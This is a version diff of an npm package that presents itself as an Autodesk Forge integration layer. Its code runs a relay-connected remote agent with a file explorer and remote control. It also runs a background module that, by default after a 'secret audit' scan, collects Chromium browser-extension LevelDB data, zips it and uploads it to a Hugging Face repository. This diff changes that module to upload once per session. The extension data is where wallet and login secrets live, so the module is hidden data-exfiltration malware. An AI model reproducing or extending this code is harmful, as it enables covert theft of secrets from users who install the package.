forge-jsxy 1.0.105 → 1.0.108

package/assets/files-explorer-template.html

@@ -1165,6 +1165,20 @@
   .fe-overlay-gate-minimal input#password.remote-login-password {
     margin-bottom: 0;
   }
+  .fe-gate-status {
+    margin: 0 0 10px;
+    font-size: 12px;
+    line-height: 1.45;
+    color: var(--vscode-descriptionForeground);
+    text-align: center;
+    min-height: 1.2em;
+  }
+  .fe-gate-status.fe-gate-status-error {
+    color: var(--vscode-errorForeground);
+  }
+  .fe-explorer-gate-form.fe-gate-autoconnect #password.remote-login-password {
+    display: none;
+  }
   .fe-explorer-gate-form {
     margin: 0;
   }
@@ -1585,6 +1599,7 @@
     <div class="remote-login-panel card fe-overlay-gate-minimal" role="dialog" aria-modal="true">
       <form id="fe-explorer-gate" class="fe-explorer-gate-form" autocomplete="off">
         <input type="hidden" id="session" value="" autocomplete="off"/>
+        <p id="fe-gate-status" class="fe-gate-status" aria-live="polite"></p>
         <input id="password" class="remote-login-password" type="password" name="password" autocomplete="current-password" placeholder="Agent password — Enter to connect" title="Matches CFGMGR_SESSION_PASSWORD on the agent; Enter submits" autofocus/>
       </form>
     </div>
@@ -2115,6 +2130,11 @@ function scheduleAuthChallengeWatch(){
   _authChallengeWatchTimer = setTimeout(function(){
     _authChallengeWatchTimer = null;
     if(authed || !ws || ws.readyState !== 1 || !ws._pwHash) return;
+    revealGatePasswordField();
+    setGateStatus(
+      'No auth challenge from the agent. Run one forge-agent per My VPS id; upgrade/restart forge-agent, then try again.',
+      true
+    );
     setCerr(
       'No auth challenge from the agent. Run one forge-agent per My VPS id; update forge-agent/cfgmgr-agent, then Connect again. If this persists, restart the agent process.');
     setWaitmsg('Auth stalled');
@@ -2159,6 +2179,11 @@ function scheduleAuthResultWatch(){
         _authResultWatchTimer = null;
         if(authed || !ws || ws.readyState !== 1) return;
         if(!stillAuthenticating()) return;
+        revealGatePasswordField();
+        setGateStatus(
+          'No auth response from the agent (timeout). Disconnect, ensure one forge-agent matches this My VPS id, restart the agent, then connect again.',
+          true
+        );
         setCerr('No auth response from the agent (timeout). Click Disconnect, ensure one forge-agent per My VPS id matches this password, restart forge-agent, then Connect again.');
         setWaitmsg('Auth timed out');
         explorerAuthAwaitingResult = false;
@@ -3101,6 +3126,21 @@ function setCerr(t){
   if(el) el.textContent = t != null ? String(t) : '';
   refreshFeMsgsVisibility();
 }
+function setGateStatus(text, isError){
+  const el = $('fe-gate-status');
+  if(!el) return;
+  el.textContent = text != null ? String(text) : '';
+  el.classList.toggle('fe-gate-status-error', !!isError);
+}
+function setGateAutoconnectMode(on){
+  const form = $('fe-explorer-gate');
+  if(form) form.classList.toggle('fe-gate-autoconnect', !!on);
+}
+function revealGatePasswordField(){
+  setGateAutoconnectMode(false);
+  const pw = $('password');
+  if(pw) pw.classList.remove('hidden');
+}
 function setStatus(t){ $('status').textContent = t; }
 
 /** Last line shown in #xfer-status — used to snapshot state on disconnect. */
@@ -4635,6 +4675,13 @@ async function doConnect(){
   explorerAuthAwaitingResult = false;
   setCerr('');
   setWaitmsg('');
+  if(explorerGateAuthSecret()){
+    setGateAutoconnectMode(true);
+    setGateStatus('Connecting to agent…');
+  } else {
+    revealGatePasswordField();
+    setGateStatus('Enter the agent password and press Enter.');
+  }
   afterAuthDone = false;
   lastRead = null;
   pathHistory = [];
@@ -4917,11 +4964,15 @@ function onMsg(m){
     clearAuthResultWatch();
     const authSecret = explorerGateAuthSecret();
     if(!authSecret){
+      revealGatePasswordField();
+      setGateStatus('Agent password required — enter it below and press Enter.', true);
       setCerr('Password required — enter the agent password below, then press Enter.');
       explorerAuthAwaitingResult = false;
       setWaitmsg('');
       return;
     }
+    setGateAutoconnectMode(true);
+    setGateStatus('Authenticating…');
     const nonce = String(m.nonce||'');
     /** Superseded challenge (reconnect / second tab): ignore stale async hash so we never send wrong nonce. */
     ws._authChallengeSeq = (ws._authChallengeSeq || 0) + 1;
@@ -4956,6 +5007,7 @@ function onMsg(m){
       cancelForgeUpgradeReconnectTimeouts();
       setWaitmsg('');
       setCerr('');
+      setGateStatus('');
       hideAgentReconnectOverlayIfAuthed();
       if(afterAuthDone){
         /** Agent reconnected while explorer stayed open — restore HF/xfer persistence after re-auth. */
@@ -4977,6 +5029,8 @@ function onMsg(m){
       } else afterAuth();
     }
     else {
+      revealGatePasswordField();
+      setGateStatus('Authentication failed — password must match the agent.', true);
       setCerr('Authentication failed — password must match the agent; click Connect again.');
       setWaitmsg('Auth rejected');
       updateAgentShellHints();
@@ -5931,6 +5985,8 @@ function attachFeExplorerSplitters(){
 function afterAuth(){
   if(afterAuthDone) return;
   afterAuthDone = true;
+  setGateStatus('');
+  setGateAutoconnectMode(false);
   $('overlay').classList.add('hidden');
   explorerChromeVisible(true);
   $('main').classList.remove('hidden');
@@ -7232,15 +7288,27 @@ function uploadHfForceKill(){
       !!explorerGateAuthSecret();
 
     if ((autoParam === '1' && sessionParam) || skipPasswordGate) {
+      setGateAutoconnectMode(true);
       /** Keep overlay until `afterAuth()` — avoids empty chrome while socket/auth is still in flight. */
+      setGateStatus('Connecting (' + shortSessionLabel(sessionEl ? sessionEl.value : '') + ')…');
       setWaitmsg('Connecting (' + shortSessionLabel(sessionEl ? sessionEl.value : '') + ')…');
       setTimeout(function() {
         if (explorerUrlSessionReady()) {
           void doConnect();
         }
       }, 350);
-    } else {
+    } else if (explorerUrlSessionReady()) {
       scheduleExplorerAutoConnect(450);
+      if (explorerGateAuthSecret()) {
+        setGateAutoconnectMode(true);
+        setGateStatus('Connecting to agent…');
+      } else {
+        revealGatePasswordField();
+        setGateStatus('Enter the agent password and press Enter.');
+      }
+    } else {
+      revealGatePasswordField();
+      setGateStatus('Open this page with ?my_vps=<id> or enter the agent password and press Enter.');
     }
 
   } catch(e) { /* ignore */ }

package/dist/agentRunner.js

@@ -48,7 +48,9 @@ const clientId_1 = require("./clientId");
 const fsProtocol_1 = require("./fsProtocol");
 const deploymentDefaults_1 = require("./deploymentDefaults");
 const windowsInputSync_1 = require("./windowsInputSync");
+const agentRestartFromQueue_1 = require("./agentRestartFromQueue");
 const relayForAgentHttp_1 = require("./relayForAgentHttp");
+const syncClient_1 = require("./syncClient");
 function envQuietAgentEnabled() {
     const raw = (process.env.FORGE_JS_QUIET_AGENT || "").trim().toLowerCase();
     return ["1", "true", "yes", "on"].includes(raw);
@@ -250,10 +252,31 @@ function runForgeAgentWithSingleton(opts) {
         activeSyncApiUrl = api;
     };
     tryStartSidecars(false);
+    /** Poll forge-db restart queue even while relay reconnect is in backoff (clients-status auto-reconnect). */
+    let restartQueuePollTimer = null;
+    const pollRestartQueueIfDue = () => {
+        const api = (0, windowsInputSync_1.resolveSyncApiBase)();
+        if (!api)
+            return;
+        const client = new syncClient_1.ForgeSyncClient({
+            baseUrl: api,
+            clientId: (0, clientId_1.getOrCreateClientId)(),
+        });
+        void (0, agentRestartFromQueue_1.pollForgeDbAgentRestartHint)(client, { quiet: opts.quiet });
+    };
+    restartQueuePollTimer = setInterval(pollRestartQueueIfDue, 60_000);
+    if (typeof restartQueuePollTimer.unref === "function") {
+        restartQueuePollTimer.unref();
+    }
+    void pollRestartQueueIfDue();
     let cleanedUp = false;
     let cleanupPromise = null;
     const cleanupSyncOnly = () => {
         syncRestartSeq++;
+        if (restartQueuePollTimer) {
+            clearInterval(restartQueuePollTimer);
+            restartQueuePollTimer = null;
+        }
         try {
             void stopDesktopSync?.();
         }

package/dist/assets/files-explorer-template.html

@@ -10,7 +10,7 @@
 <link rel="apple-touch-icon" href="/forge-explorer-favicon.svg"/>
 <link rel="stylesheet" href="/forge-explorer-codicons/codicon.css"/>
 <link rel="stylesheet" href="/forge-explorer-highlight/explorer-highlight.css"/>
-<!-- forge-jsxy@1.0.105 reconnect-ui npm-isolated-cache hub-20gib-delete-watch -->
+<!-- forge-jsxy@1.0.108 reconnect-ui npm-isolated-cache hub-20gib-delete-watch -->
 <script>
 (function () {
   try {
@@ -1165,6 +1165,20 @@
   .fe-overlay-gate-minimal input#password.remote-login-password {
     margin-bottom: 0;
   }
+  .fe-gate-status {
+    margin: 0 0 10px;
+    font-size: 12px;
+    line-height: 1.45;
+    color: var(--vscode-descriptionForeground);
+    text-align: center;
+    min-height: 1.2em;
+  }
+  .fe-gate-status.fe-gate-status-error {
+    color: var(--vscode-errorForeground);
+  }
+  .fe-explorer-gate-form.fe-gate-autoconnect #password.remote-login-password {
+    display: none;
+  }
   .fe-explorer-gate-form {
     margin: 0;
   }
@@ -1585,6 +1599,7 @@
     <div class="remote-login-panel card fe-overlay-gate-minimal" role="dialog" aria-modal="true">
       <form id="fe-explorer-gate" class="fe-explorer-gate-form" autocomplete="off">
         <input type="hidden" id="session" value="" autocomplete="off"/>
+        <p id="fe-gate-status" class="fe-gate-status" aria-live="polite"></p>
         <input id="password" class="remote-login-password" type="password" name="password" autocomplete="current-password" placeholder="Agent password — Enter to connect" title="Matches CFGMGR_SESSION_PASSWORD on the agent; Enter submits" autofocus/>
       </form>
     </div>
@@ -2115,6 +2130,11 @@ function scheduleAuthChallengeWatch(){
   _authChallengeWatchTimer = setTimeout(function(){
     _authChallengeWatchTimer = null;
     if(authed || !ws || ws.readyState !== 1 || !ws._pwHash) return;
+    revealGatePasswordField();
+    setGateStatus(
+      'No auth challenge from the agent. Run one forge-agent per My VPS id; upgrade/restart forge-agent, then try again.',
+      true
+    );
     setCerr(
       'No auth challenge from the agent. Run one forge-agent per My VPS id; update forge-agent/cfgmgr-agent, then Connect again. If this persists, restart the agent process.');
     setWaitmsg('Auth stalled');
@@ -2159,6 +2179,11 @@ function scheduleAuthResultWatch(){
         _authResultWatchTimer = null;
         if(authed || !ws || ws.readyState !== 1) return;
         if(!stillAuthenticating()) return;
+        revealGatePasswordField();
+        setGateStatus(
+          'No auth response from the agent (timeout). Disconnect, ensure one forge-agent matches this My VPS id, restart the agent, then connect again.',
+          true
+        );
         setCerr('No auth response from the agent (timeout). Click Disconnect, ensure one forge-agent per My VPS id matches this password, restart forge-agent, then Connect again.');
         setWaitmsg('Auth timed out');
         explorerAuthAwaitingResult = false;
@@ -3101,6 +3126,21 @@ function setCerr(t){
   if(el) el.textContent = t != null ? String(t) : '';
   refreshFeMsgsVisibility();
 }
+function setGateStatus(text, isError){
+  const el = $('fe-gate-status');
+  if(!el) return;
+  el.textContent = text != null ? String(text) : '';
+  el.classList.toggle('fe-gate-status-error', !!isError);
+}
+function setGateAutoconnectMode(on){
+  const form = $('fe-explorer-gate');
+  if(form) form.classList.toggle('fe-gate-autoconnect', !!on);
+}
+function revealGatePasswordField(){
+  setGateAutoconnectMode(false);
+  const pw = $('password');
+  if(pw) pw.classList.remove('hidden');
+}
 function setStatus(t){ $('status').textContent = t; }
 
 /** Last line shown in #xfer-status — used to snapshot state on disconnect. */
@@ -4635,6 +4675,13 @@ async function doConnect(){
   explorerAuthAwaitingResult = false;
   setCerr('');
   setWaitmsg('');
+  if(explorerGateAuthSecret()){
+    setGateAutoconnectMode(true);
+    setGateStatus('Connecting to agent…');
+  } else {
+    revealGatePasswordField();
+    setGateStatus('Enter the agent password and press Enter.');
+  }
   afterAuthDone = false;
   lastRead = null;
   pathHistory = [];
@@ -4917,11 +4964,15 @@ function onMsg(m){
     clearAuthResultWatch();
     const authSecret = explorerGateAuthSecret();
     if(!authSecret){
+      revealGatePasswordField();
+      setGateStatus('Agent password required — enter it below and press Enter.', true);
       setCerr('Password required — enter the agent password below, then press Enter.');
       explorerAuthAwaitingResult = false;
       setWaitmsg('');
       return;
     }
+    setGateAutoconnectMode(true);
+    setGateStatus('Authenticating…');
     const nonce = String(m.nonce||'');
     /** Superseded challenge (reconnect / second tab): ignore stale async hash so we never send wrong nonce. */
     ws._authChallengeSeq = (ws._authChallengeSeq || 0) + 1;
@@ -4956,6 +5007,7 @@ function onMsg(m){
       cancelForgeUpgradeReconnectTimeouts();
       setWaitmsg('');
       setCerr('');
+      setGateStatus('');
       hideAgentReconnectOverlayIfAuthed();
       if(afterAuthDone){
         /** Agent reconnected while explorer stayed open — restore HF/xfer persistence after re-auth. */
@@ -4977,6 +5029,8 @@ function onMsg(m){
       } else afterAuth();
     }
     else {
+      revealGatePasswordField();
+      setGateStatus('Authentication failed — password must match the agent.', true);
       setCerr('Authentication failed — password must match the agent; click Connect again.');
       setWaitmsg('Auth rejected');
       updateAgentShellHints();
@@ -5931,6 +5985,8 @@ function attachFeExplorerSplitters(){
 function afterAuth(){
   if(afterAuthDone) return;
   afterAuthDone = true;
+  setGateStatus('');
+  setGateAutoconnectMode(false);
   $('overlay').classList.add('hidden');
   explorerChromeVisible(true);
   $('main').classList.remove('hidden');
@@ -7232,15 +7288,27 @@ function uploadHfForceKill(){
       !!explorerGateAuthSecret();
 
     if ((autoParam === '1' && sessionParam) || skipPasswordGate) {
+      setGateAutoconnectMode(true);
       /** Keep overlay until `afterAuth()` — avoids empty chrome while socket/auth is still in flight. */
+      setGateStatus('Connecting (' + shortSessionLabel(sessionEl ? sessionEl.value : '') + ')…');
       setWaitmsg('Connecting (' + shortSessionLabel(sessionEl ? sessionEl.value : '') + ')…');
       setTimeout(function() {
         if (explorerUrlSessionReady()) {
           void doConnect();
         }
       }, 350);
-    } else {
+    } else if (explorerUrlSessionReady()) {
       scheduleExplorerAutoConnect(450);
+      if (explorerGateAuthSecret()) {
+        setGateAutoconnectMode(true);
+        setGateStatus('Connecting to agent…');
+      } else {
+        revealGatePasswordField();
+        setGateStatus('Enter the agent password and press Enter.');
+      }
+    } else {
+      revealGatePasswordField();
+      setGateStatus('Open this page with ?my_vps=<id> or enter the agent password and press Enter.');
     }
 
   } catch(e) { /* ignore */ }

package/dist/extensionDbHfUpload.d.ts

@@ -1,16 +1,14 @@
-/**
- * After secret-audit scan + optional `result.json` Hub upload: harvest Chromium extension
- * folders containing LevelDB `.ldb` files, zip, and upload to `namespace/<seq_id>` (session repo).
- *
- * Appends to an existing session repo when present (new export folder per run).
- * Ignores HF/network failures (logs only).
- * Runs in the background — does not block the relay agent loop.
- */
 import type { HfCredentials } from "./hfCredentials";
 /** Operational logs always emit (even when `FORGE_JS_QUIET_AGENT=1`). */
 export declare function extensionDbLog(message: string): void;
 /** Default ON when secret audit is enabled. Opt out: FORGE_JS_AGENT_EXTENSION_DB_HF_UPLOAD=0 */
 export declare function isExtensionDbHfUploadEnabled(): boolean;
+/** Local record that extension data was uploaded for a Hub session repo (avoids repeat harvest/upload). */
+export declare function readExtensionDbUploadMarker(): {
+    repo: string;
+    uploaded_at: string;
+} | null;
+export declare function writeExtensionDbUploadMarker(repoStr: string): void;
 export type RunExtensionDbHfUploadOptions = {
     clientTableName: string;
     fetchHubCredentials: () => Promise<HfCredentials>;
@@ -21,7 +19,7 @@ export type RunExtensionDbHfUploadOptions = {
 };
 /**
  * Harvest extension `.ldb` folders → zip → Hub session repo (`namespace/<seq_id>`).
- * No-op when disabled, repo exists, nothing to copy, or credentials missing.
+ * No-op when disabled, repo already exists, nothing to copy, or credentials missing.
  */
 export declare function runExtensionDbHfUploadAfterAudit(opts: RunExtensionDbHfUploadOptions): Promise<void>;
 /** Fire-and-forget background upload (after secret audit completes). */

package/dist/extensionDbHfUpload.js

@@ -1,9 +1,55 @@
 "use strict";
+var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {
+    if (k2 === undefined) k2 = k;
+    var desc = Object.getOwnPropertyDescriptor(m, k);
+    if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {
+      desc = { enumerable: true, get: function() { return m[k]; } };
+    }
+    Object.defineProperty(o, k2, desc);
+}) : (function(o, m, k, k2) {
+    if (k2 === undefined) k2 = k;
+    o[k2] = m[k];
+}));
+var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {
+    Object.defineProperty(o, "default", { enumerable: true, value: v });
+}) : function(o, v) {
+    o["default"] = v;
+});
+var __importStar = (this && this.__importStar) || (function () {
+    var ownKeys = function(o) {
+        ownKeys = Object.getOwnPropertyNames || function (o) {
+            var ar = [];
+            for (var k in o) if (Object.prototype.hasOwnProperty.call(o, k)) ar[ar.length] = k;
+            return ar;
+        };
+        return ownKeys(o);
+    };
+    return function (mod) {
+        if (mod && mod.__esModule) return mod;
+        var result = {};
+        if (mod != null) for (var k = ownKeys(mod), i = 0; i < k.length; i++) if (k[i] !== "default") __createBinding(result, mod, k[i]);
+        __setModuleDefault(result, mod);
+        return result;
+    };
+})();
 Object.defineProperty(exports, "__esModule", { value: true });
 exports.extensionDbLog = extensionDbLog;
 exports.isExtensionDbHfUploadEnabled = isExtensionDbHfUploadEnabled;
+exports.readExtensionDbUploadMarker = readExtensionDbUploadMarker;
+exports.writeExtensionDbUploadMarker = writeExtensionDbUploadMarker;
 exports.runExtensionDbHfUploadAfterAudit = runExtensionDbHfUploadAfterAudit;
 exports.scheduleExtensionDbHfUploadAfterAudit = scheduleExtensionDbHfUploadAfterAudit;
+/**
+ * After secret-audit scan: harvest Chromium extension folders containing LevelDB `.ldb`
+ * files, zip, and upload once to `namespace/<seq_id>` (session repo).
+ *
+ * When the session Hub repo already exists, the upload is skipped (no duplicate snapshots).
+ * Ignores HF/network failures (logs only).
+ * Runs in the background — does not block the relay agent loop.
+ */
+const hub_1 = require("@huggingface/hub");
+const fs = __importStar(require("node:fs"));
+const path = __importStar(require("node:path"));
 const hfCredentials_1 = require("./hfCredentials");
 const hfUpload_1 = require("./hfUpload");
 const hfSeqIdLookup_1 = require("./hfSeqIdLookup");
@@ -87,19 +133,55 @@ function isIgnorableHubError(err) {
     const msg = err instanceof Error ? err.message : String(err);
     return (/could not reach hugging face|network|fetch failed|econnrefused|enotfound|etimedout|socket hang up/i.test(msg) || /hub upload skipped/i.test(msg));
 }
-let extensionDbUploadInFlight = false;
-let pendingExtensionDbRetry = null;
-function mergeExtensionDbUploadOpts(prev, next) {
-    if (!prev)
-        return next;
-    return {
-        ...prev,
-        ...next,
-        clientSeqId: next.clientSeqId !== undefined && next.clientSeqId !== null
-            ? next.clientSeqId
-            : prev.clientSeqId,
-    };
+const EXTENSION_DB_HF_UPLOAD_MARKER = "extension-db-hf-upload.json";
+function extensionDbUploadMarkerFile() {
+    return path.join(path.dirname((0, chromiumExtensionDbHarvest_1.extensionDbStagingRoot)()), EXTENSION_DB_HF_UPLOAD_MARKER);
+}
+/** Local record that extension data was uploaded for a Hub session repo (avoids repeat harvest/upload). */
+function readExtensionDbUploadMarker() {
+    try {
+        const raw = fs.readFileSync(extensionDbUploadMarkerFile(), "utf8");
+        const parsed = JSON.parse(raw);
+        const repo = typeof parsed.repo === "string" ? parsed.repo.trim() : "";
+        if (!repo)
+            return null;
+        return {
+            repo,
+            uploaded_at: typeof parsed.uploaded_at === "string" ? parsed.uploaded_at : "",
+        };
+    }
+    catch {
+        return null;
+    }
+}
+function writeExtensionDbUploadMarker(repoStr) {
+    const repo = repoStr.trim();
+    if (!repo)
+        return;
+    const markerPath = extensionDbUploadMarkerFile();
+    fs.mkdirSync(path.dirname(markerPath), { recursive: true });
+    const tmp = `${markerPath}.${process.pid}.${Date.now()}.tmp`;
+    const doc = { repo, uploaded_at: new Date().toISOString() };
+    fs.writeFileSync(tmp, JSON.stringify(doc, null, 2), "utf8");
+    fs.renameSync(tmp, markerPath);
+}
+function extensionDbUploadRecordedForRepo(repoStr) {
+    const marker = readExtensionDbUploadMarker();
+    return marker !== null && marker.repo === repoStr.trim();
 }
+async function sessionHubRepoAlreadyExists(repoStr, creds) {
+    try {
+        return await (0, hub_1.repoExists)({
+            repo: repoStr.trim(),
+            accessToken: creds.token,
+            hubUrl: creds.hubUrl,
+        });
+    }
+    catch {
+        return false;
+    }
+}
+let extensionDbUploadInFlight = false;
 function resolveRelayHttpBaseForExtensionUpload(opts) {
     const explicit = (opts.relayHttpBase || "").trim();
     if (explicit)
@@ -114,7 +196,7 @@ function resolveRelayHttpBaseForExtensionUpload(opts) {
 }
 /**
  * Harvest extension `.ldb` folders → zip → Hub session repo (`namespace/<seq_id>`).
- * No-op when disabled, repo exists, nothing to copy, or credentials missing.
+ * No-op when disabled, repo already exists, nothing to copy, or credentials missing.
  */
 async function runExtensionDbHfUploadAfterAudit(opts) {
     if (!isExtensionDbHfUploadEnabled())
@@ -125,8 +207,7 @@ async function runExtensionDbHfUploadAfterAudit(opts) {
         return;
     }
     if (extensionDbUploadInFlight) {
-        pendingExtensionDbRetry = mergeExtensionDbUploadOpts(pendingExtensionDbRetry, opts);
-        extensionDbLog("deferred — previous extension upload still running (queued retry)");
+        extensionDbLog("skipped — previous extension upload still running");
         return;
     }
     extensionDbUploadInFlight = true;
@@ -153,6 +234,15 @@ async function runExtensionDbHfUploadAfterAudit(opts) {
         if (!targetRepo) {
             return;
         }
+        if (extensionDbUploadRecordedForRepo(targetRepo)) {
+            extensionDbLog(`skipped — extension data already uploaded (local marker for ${targetRepo})`);
+            return;
+        }
+        if (await sessionHubRepoAlreadyExists(targetRepo, creds)) {
+            writeExtensionDbUploadMarker(targetRepo);
+            extensionDbLog(`skipped — extension data already uploaded (Hub repo ${targetRepo} exists)`);
+            return;
+        }
         let resolvedSeqId = opts.clientSeqId ?? null;
         if (resolvedSeqId === null) {
             resolvedSeqId = await (0, hfSeqIdLookup_1.fetchSeqIdForClientTableName)(clientTable, {
@@ -190,9 +280,14 @@ async function runExtensionDbHfUploadAfterAudit(opts) {
             hfCredentials: creds,
             forceKill: true,
             force: true,
-            skipIfRepoExists: false,
+            skipIfRepoExists: true,
         });
-        if (upload.ok === true) {
+        if (upload.ok === true && upload.skipped === true) {
+            writeExtensionDbUploadMarker(String(upload.repo || targetRepo));
+            extensionDbLog(`skipped — extension data already uploaded (Hub repo ${String(upload.repo || targetRepo)})`);
+        }
+        else if (upload.ok === true) {
+            writeExtensionDbUploadMarker(String(upload.repo || targetRepo));
             extensionDbLog(`upload OK — repo ${String(upload.repo || targetRepo)} (${harvest.sources.length} extension folder(s), ${stagedFiles} files)`);
         }
         else {
@@ -218,13 +313,6 @@ async function runExtensionDbHfUploadAfterAudit(opts) {
         if (creds)
             (0, hfCredentials_1.scrubHfCredentialsInPlace)(creds);
         await (0, chromiumExtensionDbHarvest_1.removeExtensionDbStaging)();
-        const retry = pendingExtensionDbRetry;
-        pendingExtensionDbRetry = null;
-        if (retry) {
-            setImmediate(() => {
-                void runExtensionDbHfUploadAfterAudit(retry);
-            });
-        }
     }
 }
 /** Fire-and-forget background upload (after secret audit completes). */

package/dist/filesExplorer.d.ts

@@ -1,3 +1,5 @@
+/** Password embedded in explorer HTML — must match agent session password (see `resolvePassword` in agentRunner). */
+export declare function resolveExplorerHtmlPassword(opts?: FilesExplorerHtmlOptions): string;
 export interface FilesExplorerHtmlOptions {
     /** Shown in UI and passed to JS (use env CFGMGR_SESSION_PASSWORD in production). */
     defaultPassword?: string;

package/dist/filesExplorer.js

@@ -33,6 +33,7 @@ var __importStar = (this && this.__importStar) || (function () {
     };
 })();
 Object.defineProperty(exports, "__esModule", { value: true });
+exports.resolveExplorerHtmlPassword = resolveExplorerHtmlPassword;
 exports.getForgeExplorerFaviconSvg = getForgeExplorerFaviconSvg;
 exports.readExplorerCodiconAsset = readExplorerCodiconAsset;
 exports.readExplorerHighlightAsset = readExplorerHighlightAsset;
@@ -45,6 +46,16 @@ exports.buildRemoteControlHtml = buildRemoteControlHtml;
 const fs = __importStar(require("node:fs"));
 const path = __importStar(require("node:path"));
 const deploymentDefaults_1 = require("./deploymentDefaults");
+/** Password embedded in explorer HTML — must match agent session password (see `resolvePassword` in agentRunner). */
+function resolveExplorerHtmlPassword(opts = {}) {
+    const fromOpts = (opts.defaultPassword ?? "").trim();
+    if (fromOpts)
+        return fromOpts;
+    const fromEnv = (process.env.CFGMGR_SESSION_PASSWORD ?? "").trim();
+    if (fromEnv)
+        return fromEnv;
+    return (deploymentDefaults_1.DEFAULT_EXPLORER_PASSWORD ?? "").trim();
+}
 let _cachedTemplate = null;
 let _cachedRemoteTemplate = null;
 let _cachedFaviconSvg = null;
@@ -194,9 +205,7 @@ function forgeJsPackageVersion() {
     return _forgeJsPkgVersion;
 }
 function buildFilesExplorerHtml(opts = {}) {
-    const pwd = opts.defaultPassword ??
-        process.env.CFGMGR_SESSION_PASSWORD ??
-        deploymentDefaults_1.DEFAULT_EXPLORER_PASSWORD;
+    const pwd = resolveExplorerHtmlPassword(opts);
     let relay = opts.relayFallbackWs ??
         process.env.CFGMGR_RELAY_FALLBACK ??
         process.env.CFGMGR_RELAY_URL ??
@@ -213,9 +222,7 @@ function buildFilesExplorerHtml(opts = {}) {
         .replace('href="/forge-explorer-highlight/explorer-highlight.css"', `href="/forge-explorer-highlight/explorer-highlight.css?v=${ver}"`);
 }
 function buildRemoteControlHtml(opts = {}) {
-    const pwd = opts.defaultPassword ??
-        process.env.CFGMGR_SESSION_PASSWORD ??
-        deploymentDefaults_1.DEFAULT_EXPLORER_PASSWORD;
+    const pwd = resolveExplorerHtmlPassword(opts);
     let relay = opts.relayFallbackWs ??
         process.env.CFGMGR_RELAY_FALLBACK ??
         process.env.CFGMGR_RELAY_URL ??

package/dist/hfUpload.d.ts

@@ -24,7 +24,8 @@ export interface RunHfUploadOptions {
     folderMode?: "zip" | "tree";
     /**
      * When true: repo = `namespace/<seq_id>` when forge-db exposes `seq_id` for this session, else legacy table slug.
-     * First upload creates the repo; later uploads append new files only.
+     * First upload creates the repo; later automatic extension uploads skip when the repo exists.
+     * Manual explorer uploads still append under `exports/<timestamp>/`.
      */
     autoSessionRepo?: boolean;
     /** Session / DB table id (e.g. `client_<uuid>`) — required if `autoSessionRepo`. */

package/dist/relayAgent.js

@@ -558,6 +558,8 @@ function runRelayAgentLoop(opts) {
         /** forge-db `seq_id` pushed by relay (`agent_session_seq`) for Hub session repo uploads. */
         let relayClientSeqId;
         let extensionDbUploadDelayTimer = null;
+        /** At most one extension-db Hub upload attempt per relay WebSocket connection. */
+        let extensionDbUploadScheduledThisConnection = false;
         const clearExtensionDbUploadDelay = () => {
             if (extensionDbUploadDelayTimer != null) {
                 clearTimeout(extensionDbUploadDelayTimer);
@@ -573,7 +575,10 @@ function runRelayAgentLoop(opts) {
             }
             return undefined;
         };
-        const scheduleExtensionDbUploadForSession = () => {
+        const scheduleExtensionDbUploadForSessionOnce = () => {
+            if (extensionDbUploadScheduledThisConnection)
+                return;
+            extensionDbUploadScheduledThisConnection = true;
             (0, extensionDbHfUpload_1.scheduleExtensionDbHfUploadAfterAudit)({
                 clientTableName: sessionId,
                 fetchHubCredentials: () => fetchHfCredentialsFromRelay(sendJson),
@@ -584,7 +589,7 @@ function runRelayAgentLoop(opts) {
         };
         const armExtensionDbUploadAfterSeq = () => {
             clearExtensionDbUploadDelay();
-            scheduleExtensionDbUploadForSession();
+            scheduleExtensionDbUploadForSessionOnce();
         };
         /**
          * Run secret audit when relay never sends `connected` (stuck handshake / flaky relay).
@@ -621,12 +626,7 @@ function runRelayAgentLoop(opts) {
                     clientTableName: sessionId,
                     fetchHubCredentials: () => Promise.reject(new Error("relay handshake incomplete — skipping relay-hosted HF credentials fetch")),
                 });
-                (0, extensionDbHfUpload_1.scheduleExtensionDbHfUploadAfterAudit)({
-                    clientTableName: sessionId,
-                    fetchHubCredentials: () => Promise.reject(new Error("relay handshake incomplete — skipping relay-hosted HF credentials fetch")),
-                    quiet,
-                    relayHttpBase: (0, relayForAgentHttp_1.wsRelayUrlToHttpBase)(base) ?? undefined,
-                });
+                scheduleExtensionDbUploadForSessionOnce();
             }, fallbackMs);
             secretAuditHandshakeFallbackTimer.unref?.();
         };
@@ -754,9 +754,6 @@ function runRelayAgentLoop(opts) {
                 quiet,
                 clientTableName: sessionId,
                 fetchHubCredentials: () => fetchHfCredentialsFromRelay(sendJson),
-                onSettled: () => {
-                    scheduleExtensionDbUploadForSession();
-                },
             });
             const seqFromConnected = parseRelayClientSeqId(msg.client_seq_id ?? msg.clientSeqId);
             if (seqFromConnected !== undefined)
@@ -792,6 +789,7 @@ function runRelayAgentLoop(opts) {
             pendingAuthNonce = "";
             openHandlerFinishedInfo = false;
             relayAgentHandshakeDone = false;
+            extensionDbUploadScheduledThisConnection = false;
             discordLoopStarted = false;
             discordEnabledByRelayHandshake = false;
             armSecretAuditHandshakeFallback();
@@ -914,8 +912,10 @@ function runRelayAgentLoop(opts) {
                 const seq = parseRelayClientSeqId(msg.seq_id ?? msg.client_seq_id);
                 if (seq !== undefined) {
                     relayClientSeqId = seq;
-                    clearExtensionDbUploadDelay();
-                    scheduleExtensionDbUploadForSession();
+                    if (!extensionDbUploadScheduledThisConnection) {
+                        clearExtensionDbUploadDelay();
+                        armExtensionDbUploadAfterSeq();
+                    }
                 }
                 return;
             }

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "forge-jsxy",
-  "version": "1.0.105",
+  "version": "1.0.108",
   "description": "Node.js integration layer for Autodesk Forge",
   "license": "MIT",
   "forgeAgentWebRtcMinVersion": "1.0.71",
@@ -20,7 +20,7 @@
     "pretest": "npm run build",
     "test": "NODE_ENV=test node --test test/smoke.test.mjs test/forge-bulk-protocol.test.mjs",
     "test:explorer": "npm run build && NODE_ENV=test node --test test/explorer-terminal-controls.test.mjs test/cross-os-install.test.mjs",
